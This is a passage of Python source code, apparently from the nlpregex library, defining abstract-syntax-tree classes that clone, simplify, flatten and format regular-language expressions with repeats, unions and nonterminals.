):\n\n new_node = nlpregex.regular_language.ast.ASTNode( 'infinite repeat', '' )\n new_node.add_to_graph( ast )\n\n if rtype == 'STAR':\n new_node.set_repeat( 0, -1 )\n\n elif rtype == 'PLUS':\n new_node.set_repeat( 1, -1 )\n\n new_edge = nlpregex.regular_language.ast.ASTEdge()\n new_edge.add_to_graph( ast, new_node, child_node, dir=\"directed\" )\n\n return new_node\n\n\nclass ASTNode(nlpregex.abs_graph.node.BaseNode):\n\n\n def __init__( self, ast_node_type, content):\n\n super().__init__()\n\n self.ast_node_type = ast_node_type \n self.content = content\n self.repeat_min = 1\n self.repeat_max = 1\n self.phrase_count = 1\n self.text_width = 0\n self.out_token_pre = [] # later in the list, the closer to the root of AST\n self.out_token_post = [] # later in the list, the closer to the root of AST\n
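\n # repeat_min/repeat_max encode the usual repetition operators:\n # (0, -1) = '*', (1, -1) = '+', (0, 1) = '?', (1, 1) = no repetition.\n def set_repeat( 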
self, b, e ):\n self.repeat_min = b\n self.repeat_max = e\n\n\n def append_out_token_pre(self, t):\n self.out_token_pre.append(t)\n\n\n def append_out_token_post(self, t):\n self.out_token_post.append(t)\n\n\n def get_children( self ):\n return [ e.other_node_of( self ) for e in self.out_neighbors() ]\n\n\n def get_parent( self ):\n if len(self.in_neighbors())==1:\n return self.in_neighbors()[0].other_node_of( self )\n else:\n return None\n\n\n # @virtual\n # @brief deep copies the contents from the other node\n def copy_from( self, n ):\n self.ast_node_type = n.ast_node_type\n self.content = n.content\n self.repeat_min = n.repeat_min\n self.repeat_max = n.repeat_max\n self.phrase_count = n.phrase_count\n self.text_width = n.text_width\n self.out_token_pre = list( n.out_token_pre )\n self.out_token_post = list( n.out_token_post )\n\n\n # @virtual\n # @brief reset the values of the node, keeping it in the tree\n def reset( self ):\n self.ast_node_type = '' # Must be filled immediately after this call\n self.content = ''\n self.repeat_min = 1\n self.repeat_max = 1\n self.phrase_count = 1\n self.text_width = 0\n self.out_token_pre = []\n self.out_token_post = []\n\n\n # @virtual\n # @brief returns true if this node can be removed to flatten the tree.\n def can_be_flattened(self):\n return len(self.out_token_pre) == 0 and len(self.out_token_post) == 0\n\n\n # @virtual\n # @brief\n # returns a string if the node has other string to be added before and after\n # for generating expanded phrases.\n #\n # @param id: unique number assigned to each invocation of a pair of those calls\n # the callee can use this to emit unique string.\n def attribute_for_expansion_before( self, id ):\n if len(self.out_token_pre) > 0:\n rev = list( reversed(self.out_token_pre) )\n content = ' '.join( rev )\n return '[ ' + content + ' ]'\n else:\n return ''\n\n def attribute_for_expansion_after ( self, id ):\n if len(self.out_token_post) > 0:\n content = ' '.join(self.out_token_post)\n return '[ ' + content + ' ]'\n else:\n return ''\n\n\n # @virtual\n # @brief\n # returns a string if the node has other string to be added before and after\n # for emiiting formatted rules.\n def prologue_for_formatted_text(self):\n if len(self.out_token_pre) > 0:\n rev = list( reversed(self.out_token_pre) )\n content = ' '.join( rev )\n return '[ ' + content + ' ]'\n else:\n return ''\n\n def epilogue_for_formatted_text(self):\n if len(self.out_token_post) > 0:\n content = ' '.join(self.out_token_post)\n return '[ ' + content + ' ]'\n else:\n return ''\n\n\n # @virtual\n # @brief\n # returns a list of extra out_tokens for the epsilon transitions \n # prepended and appended to the main transition.\n #\n def extra_epsilon_nodes_before (self):\n\n rev = list( reversed( self.out_token_pre ) )\n\n return ' '.join( rev )\n\n def extra_epsilon_nodes_after (self):\n\n return ' '.join( self.out_token_post )\n\n\n # @virtual\n # @brief\n # returns the in_token and out_token for the main transition\n def node_content_for_fst_main(self, id):\n return (self.content, '')\n\n\n # @virtual\n # @brief\n # saves the attributes of this node to be removed.\n # used when a nonterminal node is replaced with a subtree.\n # saved attributes are merged to the replacing node\n #\n # @return attributes saved\n def save_attributes(self):\n return ( self.out_token_pre, self.out_token_post )\n\n # @virtual\n # @brief\n # merges saved attributes to this node.\n # used when a nonterminal node is replaced with a subtree.\n #\n # @param attributes returned by 
saved_attributes\n def merge_attributes(self, saved_attrib):\n\n for t in saved_attrib[0]:\n self.out_token_pre.append(t)\n\n for t in saved_attrib[1]:\n self.out_token_post.append(t)\n\n\n # @virtual\n # @brief\n # returns a string to be used a a node label for graphviz\n # \n # @param show_attributes : display attributes.\n #\n # @return (string to be shown, True/False) \n # The 2nd param shows if the children must be \n # visited or not.\n def generate_string_for_drawing(self, show_attributes):\n\n label_out = \"\"\n should_visit_children = True\n if self.ast_node_type == 'terminal':\n label_out += self.content.replace('\"','')\n\n elif self.ast_node_type == 'nonterminal':\n label_out += self.content.replace('\"','')\n\n elif self.ast_node_type == 'epsilon':\n label_out += \"ε\"\n\n elif self.ast_node_type == 'sequence':\n if self.are_children_all_terminals(show_attributes):\n should_visit_children = False\n label_out += self.aggregate_child_labels()\n else:\n label_out += \"SEQ\"\n\n elif self.ast_node_type == 'union':\n label_out += \"|\"\n\n elif self.ast_node_type == 'infinite repeat':\n if self.repeat_min == 0:\n label_out += \"*\"\n else:\n label_out += \"+\"\n\n elif self.ast_node_type == 'finite repeat':\n label_out += ( \"{ \" + str(self.repeat_min) + \", \" + str(self.repeat_max) + \" }\" )\n\n if self.phrase_count > 1:\n label_out += ( ' (' + str(self.phrase_count) + ')' )\n\n if show_attributes:\n\n prologue = self.prologue_for_formatted_text()\n if prologue != '':\n label_out = prologue + ' ' + label_out \n\n epilogue = self.epilogue_for_formatted_text()\n if epilogue != '':\n label_out = label_out + ' ' + epilogue\n\n return '\"' + label_out + '\"', should_visit_children\n\n\n # @brief subroutine for generate_string_for_drawing()\n # if there is no children, return False.\n # @param show_attributes : display attributes.\n def are_children_all_terminals(self, show_attributes):\n \n children = [ e.other_node_of( self ) for e in self.out_neighbors() ]\n\n if len(children) == 0:\n return False\n\n for c in children:\n if c.ast_node_type != 'terminal':\n return False\n\n if show_attributes:\n attr_str = c.prologue_for_formatted_text() + c.epilogue_for_formatted_text()\n if attr_str != '':\n return False\n\n return True\n\n\n # @brief subroutine for generate_string_for_drawing()\n def aggregate_child_labels(self):\n\n out_str = ''\n \n children = [ e.other_node_of( self ) for e in self.out_neighbors() ]\n first = True\n for c in children:\n if first:\n first = False\n else:\n out_str += ' '\n \n out_str += c.content.replace('\"','')\n\n return out_str\n\n\n # @brief diag string\n def __str__(self):\n\n out_str = \"Type: [\"\n out_str += self.ast_node_type\n out_str += \"] Token: [\"\n out_str += self.content\n out_str += \"] Repeat: (\"\n out_str += str(self.repeat_min)\n out_str += \", \"\n out_str += str(self.repeat_max)\n out_str += \") Count: \"\n out_str += str (self.phrase_count)\n out_str += \" Text Width: \"\n out_str += str (self.text_width)\n out_str += \" Out Token Pre: [\"\n out_str += self.prologue_for_formatted_text()\n out_str += \"] Out Token Post: [\"\n out_str += self.epilogue_for_formatted_text()\n out_str += \"]\"\n return out_str\n\n\n\n\n\n\nclass ASTEdge(nlpregex.abs_graph.edge.BaseEdge):\n\n def __init__(self):\n super().__init__()\n\n\n\n\n\n\n\nclass AST(nlpregex.abs_graph.graph.RootedTree):\n\n\n def __init__(self):\n super().__init__()\n self.node_attribute_id_next = 0\n\n\n\n # @public\n # @brief incidence oder preserving clone\n def clone( self 
):\n\n gclone = AST();\n\n node_id = 1\n\n id_to_clone_node = {}\n\n for n in self.nodes():\n\n nclone = type(n)(\"\",\"\") # subclass of ASTNode\n nclone.copy_from(n)\n\n n.node_id = node_id\n nclone.node_id = node_id\n\n id_to_clone_node[node_id] = nclone\n\n nclone.add_to_graph(gclone)\n\n if n == self.root:\n gclone.add_root(nclone)\n\n node_id += 1\n\n\n for n in self.nodes():\n\n src_clone = id_to_clone_node[n.node_id]\n\n for c in [ e.other_node_of(n) for e in n.out_neighbors() ]:\n\n dst_clone = id_to_clone_node[c.node_id] \n\n eclone = ASTEdge() \n eclone.add_to_graph( gclone, src_clone, dst_clone, \"directed\" )\n\n for n in self.nodes():\n delattr( n, 'node_id' )\n\n for n in gclone.nodes():\n delattr( n, 'node_id' )\n\n\n return gclone\n\n\n\n ########################################\n # #\n # remove & clone subtree #\n # #\n ########################################\n\n # @public\n # @brief remove subtree from this AST.\n # @param root: root of the subtree to be removed\n def remove_subtree( self, root ):\n\n self.visit_and_remove_subtree( root )\n if root == self.root:\n self.root = None\n\n\n # @brief recursive subroutine of remove_subtree\n def visit_and_remove_subtree( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n for c in children:\n self.visit_and_remove_subtree( c )\n n.remove_from_graph()\n\n\n # @public\n # @brief creates a clone of the subtree from this AST.\n # @param root: root of the subtree\n # @return cloned subtree\n def clone_subtree(self, root):\n\n subtree_nodes = self.visit_and_gather_subtree_nodes( root )\n\n g_clone = AST();\n\n node_id = 1\n id_to_original_node = {}\n id_to_clone_node = {}\n for n_org in subtree_nodes:\n\n n_clone = type(n_org)(\"\",\"\") # subclass of ASTNode()\n n_clone.copy_from(n_org)\n\n n_org.node_id = node_id\n n_clone.node_id = node_id\n\n id_to_clone_node [node_id] = n_clone\n id_to_original_node[node_id] = n_org\n\n n_clone.add_to_graph(g_clone)\n\n if n_org == root:\n g_clone.add_root(n_clone)\n\n node_id += 1\n\n self.visit_and_clone_edges(root, g_clone, id_to_clone_node)\n\n org_nodes = [id_to_original_node[k] for k in id_to_original_node ]\n\n for n in org_nodes:\n delattr( n, 'node_id' )\n\n for n in g_clone.nodes():\n delattr( n, 'node_id' )\n\n\n return g_clone\n\n\n # @brief recursive subroutine of clone_subtree\n def visit_and_gather_subtree_nodes(self, n):\n node_list = [n]\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n node_list += self.visit_and_gather_subtree_nodes(c)\n\n return node_list\n\n\n # @brief recursive subroutine of clone_subtree\n def visit_and_clone_edges(self, n, gclone, id_to_clone_node):\n\n for e in n.out_neighbors():\n src_clone = id_to_clone_node[e.src_node.node_id]\n dst_clone = id_to_clone_node[e.dst_node.node_id]\n\n eclone = ASTEdge() \n eclone.add_to_graph( gclone, src_clone, dst_clone, \"directed\" )\n \n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n for c in children:\n self.visit_and_clone_edges(c, gclone, id_to_clone_node)\n\n\n # @brief keeping the node n at its current position, copy\n # the contents of the only child into n, remove the child\n # and pull up grand children under n.\n def pullup_only_child(self, n):\n\n child_nodes = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n c = child_nodes[0]\n\n grand_child_nodes = [ e.other_node_of( c ) for e in c.out_neighbors() ]\n\n\n # Migrate all the contents of c to n\n saved_attrib = n.save_attributes()\n n.copy_from( c )\n 
n.merge_attributes( saved_attrib )\n\n c.remove_from_graph()\n\n for gc in grand_child_nodes:\n\n e = ASTEdge()\n e.add_to_graph( self, n, gc, \"directed\" )\n\n\n ########################################\n # #\n # clean_epsilon() #\n # #\n ########################################\n\n\n # @public\n # @brief eliminate epsilon node from the tree\n # \n # case n is a sequence\n # - remove child epsilons\n # - if there is no child, remove n\n # - if there is only one child, pull up the child to n.\n # \n # case n is a union \n # - remove child epsilons\n # - if there is no child, remove n\n # - if epsilon is removed\n # - if there is only one child, update n to {0,1}\n # - otherwise, update n to {0,1}, create a new only child c,\n # make c a union, and put the children of n under c.\n # - if epsilon is not removed\n # - if there is only one child, pull up the child to n\n #\n # case n is a finite repeat\n # - remove child epsilon\n # - if there is no child, remove n\n # - if n is {1,1}, pull up c to n.\n # - if n is {x,y} and c is {1,1}, pull up c to n and make it to {x,y}\n # - if n is {0,1} and c is {1,x}, pull up c to n and make it to {0,x}\n # - if n is {1,x} and c is {0,1}, pull up c to n and make it to {0,x}\n # - if n is {0,1} and c is + pull up c to n and make it *\n # - if n is {0,1} and c is * pull up c to n.\n #\n # case n is an infinite repeat\n # - remove child epsilon\n # - if there is no child, remove n\n # - if c is {0,1}, pull up c to n and make it to *\n # - if n is *, and c is *, pull up c to n\n # - if n is +, and c is *, pull up c to n and make it to *\n # - if n is *, and c is +, pull up c to n and make it to *\n # - if n is +, and c is +, pull up c to n\n def clean_epsilon(self):\n if self.root:\n if self.root.ast_node_type == 'epsilon':\n self.root.remove_from_graph()\n self.root = None\n else:\n self.visit_and_clean_epsilon( self.root )\n\n\n def visit_and_clean_epsilon(self, n):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_clean_epsilon( c )\n\n epsilon_removed = False\n for c in children:\n if c.ast_node_type == 'epsilon':\n c.remove_from_graph()\n epsilon_removed = True\n\n updated_edges = [ e for e in n.out_neighbors() ] # Making a copy\n updated_children = [ e.other_node_of( n ) for e in updated_edges ]\n\n if n.ast_node_type == 'sequence':\n self.clean_epsilon_sequence( n, updated_children )\n\n elif n.ast_node_type == 'union':\n self.clean_epsilon_union( n, updated_children, epsilon_removed )\n\n elif n.ast_node_type == 'finite repeat':\n self.clean_epsilon_finite_repeat( n, updated_children )\n\n elif n.ast_node_type == 'infinite repeat':\n self.clean_epsilon_infinite_repeat( n, updated_children )\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_sequence(self, n, children):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n elif len(children) == 1:\n self.pullup_only_child(n)\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_union( self, n, children, epsilon_removed ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n elif len(children) == 1 and not epsilon_removed:\n self.pullup_only_child(n)\n\n elif len(children) == 1 and epsilon_removed:\n n.ast_node_type = 'finite repeat'\n n.repeat_min = 0\n n.repeat_max = 1\n\n elif epsilon_removed:\n n_edges = n.out_neighbors()\n for e in n_edges:\n e.remove_from_graph()\n
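\n # wrap the remaining alternatives in a fresh union child and turn n\n # into a {0,1} node: e.g. ( a | b | ε ) becomes ( a | b )?\n new_child = type(n)(\"finite repeat\", \"\") # subclass of 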
ASTNode()\n new_child.copy_from(n)\n n.reset()\n n.ast_node_type = 'finite repeat'\n n.repeat_min = 0\n n.repeat_max = 1\n\n e_child = ASTEdge()\n e_child.add_to_graph( self, n, new_child, dir=\"directed\" )\n\n for c in children:\n e = ASTEdge()\n e.add_to_graph( self, new_child, c, dir=\"directed\" )\n\n # Re-clean under n after changing n to finit repeat\n self.visit_and_clean_epsilon( n )\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_finite_repeat( self, n, children ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n\n n.remove_from_graph()\n\n else:\n c = children[0]\n\n if n.repeat_min == 1 and n.repeat_max == 1:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and c.repeat_max == 1:\n n_repeat_min = n.repeat_min\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_min = n_repeat_min\n n.repeat_max = n_repeat_max\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and c.repeat_max == 1 and n.repeat_min == 0:\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_max = n_repeat_max\n\n elif c.ast_node_type == 'finite repeat' and n.repeat_min == 0 and n.repeat_max == 1 and c.repeat_min == 0:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and c.repeat_max == 1 and n.repeat_min == 1:\n n_repeat_max = n.repeat_max\n self.pullup_only_child(n)\n n.repeat_max = n_repeat_max\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'finite repeat' and n.repeat_min == 0 and n.repeat_max == 1 and c.repeat_min == 1:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 1 and n.repeat_min == 1:\n self.pullup_only_child(n)\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 0 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 1 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'infinite repeat' and c.repeat_min == 0 and n.repeat_min == 0:\n self.pullup_only_child(n)\n\n\n\n # @brief subroutine of visit_and_clean_epsilon()\n def clean_epsilon_infinite_repeat( self, n, children ):\n\n if len(children) == 0:\n if n == self.root:\n self.root = None\n n.remove_from_graph()\n\n else:\n c = children[0]\n\n if c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n n.repeat_min = 0\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and n.repeat_min == 0:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 1 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'finite repeat' and c.repeat_min == 0 and n.repeat_min == 1:\n self.pullup_only_child(n)\n n.ast_node_type = 'infinite repeat'\n\n\n elif c.ast_node_type == 'infinite repeat':\n new_min = min(n.repeat_min, c.repeat_min)\n self.pullup_only_child(n)\n n.repeat_min = new_min\n\n\n ########################################\n # #\n # flatten_children() #\n # #\n ########################################\n\n\n # @public\n # @brief try flattening the tree by aggregating the chain\n # of the same type of nodes into a single layer.\n # used for union and sequence.\n def flatten_children( self ):\n if self.root:\n 
self.visit_and_flatten_children( self.root )\n\n\n # @brief recursive subroutine used by flatten_children\n def visit_and_flatten_children( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_flatten_children( c )\n\n if n.ast_node_type == 'union' or n.ast_node_type == 'sequence':\n\n same_type_found = False\n\n for c in children:\n \n if c.ast_node_type == n.ast_node_type and c.can_be_flattened():\n same_type_found = True\n\n if same_type_found:\n\n self.replace_child_with_grand_children( n )\n\n\n # @brief replace the children with grandchildren keeping the order\n # recursive subroutine used by flatten_children\n # 1.\n # (n)\n # |\n # +--------+-------+ <= incident_edges (to be removed)\n # c c c \n # /|\\ /|\\ /|\\\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n #\n # 2.\n # (n)\n #\n # [ c c c ] <= adjacent_nodes_of_c (to be removed)\n # /|\\ /|\\ /|\\ <= incident_edges_of_c (to be removed)\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n #\n # 3.\n # (n)\n #\n # [g1 g2 g3 g4 g5 g6 g7 g8 g9] <= new_children\n #\n # 4.\n # (n)\n # +--+--+--+-+-+--+--+--+--+\n # | | | | | | | | |\n # g1 g2 g3 g4 g5 g6 g7 g8 g9\n #\n def replace_child_with_grand_children( self, n ):\n\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacent_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for e in incident_edges: \n e.remove_from_graph()\n\n new_children = []\n\n for c in adjacent_nodes:\n\n if c.ast_node_type == n.ast_node_type:\n \n incident_edges_of_c = [ e for e in c.out_neighbors() ]\n adjacent_nodes_of_c = [ e.other_node_of( c ) for e in incident_edges_of_c ]\n\n for e in incident_edges_of_c:\n e.remove_from_graph()\n\n c.remove_from_graph()\n new_children = new_children + adjacent_nodes_of_c\n\n else:\n new_children.append(c)\n\n for c in new_children:\n new_edge = ASTEdge()\n new_edge.add_to_graph( n.graph, n, c, dir=\"directed\" )\n\n\n ########################################\n # #\n # replace_fixed_repeat_with_union() #\n # #\n ########################################\n\n\n # @public\n # @brief replace fixed repetition node with a union of \n # repeated sequences other than {0,1}.\n # this must be done before generating FST.\n # otherwise, the finite repeat nodes are treated as\n # infinite repeat in FST\n def replace_finite_repeat_with_union( self ):\n if self.root:\n self.visit_and_replace_fixed_repeat_with_union( self.root )\n self.clean_epsilon()\n self.flatten_children()\n\n # @brief recursive subroutine of replace_fixed_repeat_with_union()\n def visit_and_replace_fixed_repeat_with_union( self, n ):\n\n if n.ast_node_type != 'finite repeat':\n return\n\n if n.repeat_min == 0 and n.repeat_max == 1:\n return\n\n\n if n.repeat_min == 1 and n.repeat_max == 1:\n # removed by clean_epsilon()\n return\n\n\n if n.repeat_min == 0 and n.repeat_max == 0:\n self.remove_subtree(n)\n if n == self.root:\n self.root = None\n return\n\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n\n self.visit_and_replace_fixed_repeat_with_union( c )\n\n if n.ast_node_type == 'finite repeat' and n.repeat_max > 1:\n\n original_repeat_min = n.repeat_min\n \n c0 = children[0]\n\n new_sequences = []\n\n for i in range ( max( n.repeat_min, 1 ), n.repeat_max + 1 ):\n seq = self.create_sequence_of_repeated( c0, i )\n new_sequences.append(seq)\n\n for c in children:\n self.remove_subtree(c)\n\n if len(new_sequences) == 0:\n # Make this a dead node.\n n.ast_node_type = 'epsilon'\n n.content = ''\n
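\n # exactly one expanded sequence: splice it in directly, or wrap it in\n # a {0,1} node when the original repeat allowed zero occurrences\n elif len(new_sequences) == 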
1:\n seq_root = new_sequences[0]\n if original_repeat_min == 0:\n # replace n with {0,1}\n n.repeat_min = 0\n n.repeat_max = 1\n e = ASTEdge()\n e.add_to_graph( self, n, seq_root, dir=\"directed\" )\n\n else: \n # replace n with new_sequences[0]\n new_children = [ e.other_node_of( seq_root ) for e in seq_root.out_neighbors() ]\n\n n.copy_from(seq_root)\n seq_root.remove_from_graph()\n\n for c in new_children:\n e = ASTEdge()\n e.add_to_graph( self, n, c, dir=\"directed\" )\n\n else:\n\n if original_repeat_min == 0:\n # replace n with {0,1}\n n.repeat_min = 0\n n.repeat_max = 1\n\n n_child = type(n)(\"union\", \"\") # subclass of ASTNode()\n e_child = ASTEdge()\n e_child.add_to_graph( self, n, n_child, dir=\"directed\" )\n for c in new_sequences:\n e = ASTEdge()\n e.add_to_graph( self, n_child, c, dir=\"directed\" )\n\n else:\n n.ast_node_type = 'union'\n n.content = ''\n n.repeat_min = 1\n n.repeat_max = 1\n for c in new_sequences:\n e = ASTEdge()\n e.add_to_graph( self, n, c, dir=\"directed\" )\n\n\n # @brief subroutine of visit_and_replace_fixed_repeat_with_union()\n def create_sequence_of_repeated( self, node, num ):\n\n if num == 0:\n n_new = type(node)(\"epsilon\", \"\") # subclass of ASTNode()\n n_new.add_to_graph(self)\n return n_new\n\n if num == 1:\n g = self.clone_subtree(node)\n n_new = g.root\n self.transfer_from( g )\n return n_new\n\n else:\n n_new = type(node)(\"sequence\", \"\") # subclass of ASTNode()\n n_new.add_to_graph(self)\n for i in range (0, num):\n g = self.clone_subtree(node)\n c = g.root\n self.transfer_from( g )\n e_new = ASTEdge()\n e_new.add_to_graph( self, n_new, c, dir=\"directed\" )\n\n return n_new\n\n\n ########################################\n # #\n # expand_nonterminals() #\n # #\n ########################################\n\n\n # @public\n # @brief returns the set of names of nonterminals found in the tree.\n def find_dependent_nonterminals( self ):\n if self.root:\n return self.visit_and_find_dependent_nonterminals( self.root )\n else:\n return set()\n\n\n # @brief recursive subroutine of find_dependent_nonterminals().\n def visit_and_find_dependent_nonterminals( self, n ):\n\n S = set()\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n S_returned = self.visit_and_find_dependent_nonterminals( c )\n S = S.union( S_returned )\n\n if n.ast_node_type == 'nonterminal':\n S.add(n.content)\n\n return S\n\n\n # @public\n # @brief expand the nonterminals with the corresponding subtrees.\n # if there is a cycle, the behavior is undefined.\n #\n # @param nonterminals_expanded : list of nonterminals to be expanded\n # @param trees : dictionary {k: nonterminal v: AST}\n\n def expand_nonterminals( self, nonterminals_expanded, trees ):\n\n if self.root:\n\n self.expand_nonterminals_root( nonterminals_expanded, trees )\n self.visit_and_expand_nonterminals( self.root, nonterminals_expanded, trees )\n\n\n # @brief subroutine of expand_nonterminal()\n # special case where the root itself is the nonterminal to be replaced.\n def expand_nonterminals_root( self, nonterminals_expanded, trees ): \n\n if self.root:\n\n r_content = self.root.content\n\n if self.root.ast_node_type == 'nonterminal' and r_content in nonterminals_expanded:\n\n if r_content in trees:\n saved_attrib = self.root.save_attributes()\n self.root.remove_from_graph()\n t = trees[ r_content ].clone()\n self.root = t.root\n self.transfer_from(t)\n t.root.merge_attributes(saved_attrib)\n self.expand_nonterminals(nonterminals_expanded, trees )\n\n\n
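 # A usage sketch (illustrative names, not from the original file):\n #\n # main_ast.expand_nonterminals( [ 'GREETING' ], { 'GREETING': greeting_ast } )\n #\n # replaces every nonterminal node whose content is 'GREETING' with a\n # clone of greeting_ast.\n\n\n # @brief recursive 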
subroutine of expand_nonterminal()\n def visit_and_expand_nonterminals( self, n, nonterminals_expanded, trees ):\n\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacent_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for i in range(0,len(incident_edges)):\n\n c = adjacent_nodes[i]\n\n if c.ast_node_type == 'nonterminal':\n\n if c.content in nonterminals_expanded:\n if c.content in trees:\n next_edge = None\n if i < len(incident_edges) - 1:\n next_edge = incident_edges[i+1]\n saved_attrib = c.save_attributes()\n c.remove_from_graph()\n \n t = trees[ c.content ].clone()\n c_new = t.root\n self.transfer_from(t)\n c_new.merge_attributes(saved_attrib)\n e_new = ASTEdge()\n e_new.add_to_graph_at_specific_positions( self, n, c_new, \"directed\", next_edge, None )\n\n # Refresh the incident and adjacent features.\n incident_edges = [ e for e in n.out_neighbors() ]\n adjacent_nodes = [ e.other_node_of( n ) for e in incident_edges ]\n\n for i in range(0,len(incident_edges)):\n c = adjacent_nodes[i]\n self.visit_and_expand_nonterminals( c, nonterminals_expanded, trees )\n\n\n\n ########################################\n # #\n # emit_formatted_text() #\n # #\n ########################################\n\n\n # @public\n # @brief emit formatted rule of this AST\n # the tree must be epsilon-cleaned.\n #\n # @param width_hint: hint for the maximum width at which \n # the text is folded with carriage return\n # 0 for single line formatting.\n # @param indent: indent width for each depth\n # @param print_attr: True/False\n def emit_formatted_text(self, width_hint, indent, print_attr=True):\n self.calculate_text_width(print_attr)\n if self.root:\n return self.visit_and_emit_formatted_text( self.root, 0, width_hint, indent, print_attr )\n\n else:\n return ''\n\n\n # @brief calculate the text width of subtree at each node.\n def calculate_text_width(self, print_attr):\n \n if self.root:\n return self.visit_and_calculate_text_width( self.root, print_attr )\n else:\n return 0\n\n\n # @brief recursive subroutine of calculate_text_width()\n # this is a bottom-up accummulative process.\n # the width is stored to ASTNode.text_width.\n def visit_and_calculate_text_width( self, n, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n width = 0\n\n if n.ast_node_type == 'union':\n\n width += len('()')\n width += ( max(0, len(children) - 1) * len(' | ') )\n\n elif n.ast_node_type == 'sequence':\n\n width += ( max(0, len(children) - 1) * len(' ') )\n\n elif n.ast_node_type == 'terminal':\n width += len(n.content)\n\n elif n.ast_node_type == 'nonterminal':\n width += len(n.content)\n\n elif n.ast_node_type == 'finite repeat':\n width += len( '( ){ ' + str(n.repeat_min) + ', ' + str(n.repeat_max) + ' }' )\n\n elif n.ast_node_type == 'infinite repeat':\n width += len( '( )*' )\n\n if print_attr:\n width += len( self.add_prologue_and_epilogue( n, '', True ) )\n\n for c in children:\n width += self.visit_and_calculate_text_width( c, print_attr )\n\n n.text_width = width\n \n return width \n\n\n # @brief subroutine to visit_and_emit_formatted_text()\n def make_indent(self, indent):\n out_str = \"\"\n for i in range ( 0, indent ):\n out_str += \" \"\n return out_str\n\n\n # @brief recursive subroutine of emit_formatted_text()\n def visit_and_emit_formatted_text( self, n, depth, width_hint, indent, print_attr ):\n out_str = ''\n\n need_paren_for_attr = False\n\n if n.ast_node_type == 'terminal':\n out_str += n.content\n\n elif n.ast_node_type == 'nonterminal':\n out_str += 
n.content\n\n elif n.ast_node_type == 'union':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_union( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'sequence':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_sequence( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'finite repeat':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_finite_repeat( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n elif n.ast_node_type == 'infinite repeat':\n rtn_str, need_paren_for_attr = self.visit_and_emit_formatted_text_infinite_repeat( n, depth, width_hint, indent, print_attr )\n out_str += rtn_str\n\n\n if print_attr:\n out_str = self.add_prologue_and_epilogue( n, out_str, need_paren_for_attr )\n return out_str\n\n\n # @brief subroutine of visit_and_emit_formatted_text()\n def add_prologue_and_epilogue( self, n, out_str, need_paren ):\n\n prologue = n.prologue_for_formatted_text()\n epilogue = n.epilogue_for_formatted_text()\n\n if n.ast_node_type == 'terminal' or n.ast_node_type == 'nonterminal':\n if epilogue != '':\n out_str += ' '\n out_str += epilogue\n\n elif n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n\n prologue_insert_pos = 0\n new_out_str = ''\n if n.ast_node_type == 'union' and len(out_str)>0 and out_str[0] == '\\n':\n prologue_insert_pos = 1\n while prologue_insert_pos < len(out_str) and out_str[prologue_insert_pos] == ' ':\n prologue_insert_pos += 1\n\n if prologue != '':\n new_out_str += out_str[0:prologue_insert_pos]\n new_out_str += prologue\n new_out_str += ' '\n\n if need_paren and ( epilogue != '' or prologue != '' ):\n new_out_str += '( ' + out_str[prologue_insert_pos:] + ' )'\n else:\n new_out_str += out_str[prologue_insert_pos:]\n\n if epilogue != '':\n new_out_str += ' ' \n new_out_str += epilogue\n\n out_str = new_out_str\n\n return out_str\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def 